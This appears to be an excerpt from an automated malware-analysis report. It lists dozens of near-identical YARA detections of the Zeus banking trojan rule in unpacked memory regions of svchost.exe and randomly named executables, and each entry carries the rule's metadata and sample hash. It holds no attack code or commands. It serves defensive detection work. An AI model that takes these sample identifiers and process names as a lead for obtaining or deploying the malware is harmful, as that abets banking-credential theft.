    Source: 2.3.svchost.exe.2c70000.30.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.3.svchost.exe.883000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 0.2.arxtPs1STE.exe.407000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.3.svchost.exe.2c70000.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.3.svchost.exe.2c70000.16.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 22.2.tGYLgZxMWmmBTD.exe.1280000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.3.svchost.exe.2c70000.37.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 24.2.tGYLgZxMWmmBTD.exe.9d2000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.3.svchost.exe.4190000.9.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.3.svchost.exe.2c70000.47.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.3.svchost.exe.2c70000.31.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.3.svchost.exe.2c70000.13.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.3.svchost.exe.2c70000.30.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.3.svchost.exe.2c70000.19.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.2.svchost.exe.2a56c00.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.3.svchost.exe.2c70000.25.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.2.svchost.exe.2c13c00.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 9.2.tGYLgZxMWmmBTD.exe.2bd0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.3.svchost.exe.2c70000.14.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.3.svchost.exe.2c70000.22.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.3.svchost.exe.2c70000.51.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.2.svchost.exe.2c13c00.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 29.2.tGYLgZxMWmmBTD.exe.aa0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.3.svchost.exe.2c70000.32.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 17.2.tGYLgZxMWmmBTD.exe.e12000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.3.svchost.exe.883000.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 34.2.tGYLgZxMWmmBTD.exe.2a20000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.3.svchost.exe.2c70000.21.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 5.2.tGYLgZxMWmmBTD.exe.872000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.3.svchost.exe.2c70000.41.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.3.svchost.exe.2c70000.40.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.2.svchost.exe.2a56c00.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.3.svchost.exe.888400.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 34.2.tGYLgZxMWmmBTD.exe.2a20000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.3.svchost.exe.2c70000.50.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.3.svchost.exe.2c70000.45.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.3.svchost.exe.2c70000.23.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 6.2.tGYLgZxMWmmBTD.exe.822000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.3.svchost.exe.2c70000.41.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 0.2.arxtPs1STE.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.3.svchost.exe.2c70000.15.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.3.svchost.exe.2c70000.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
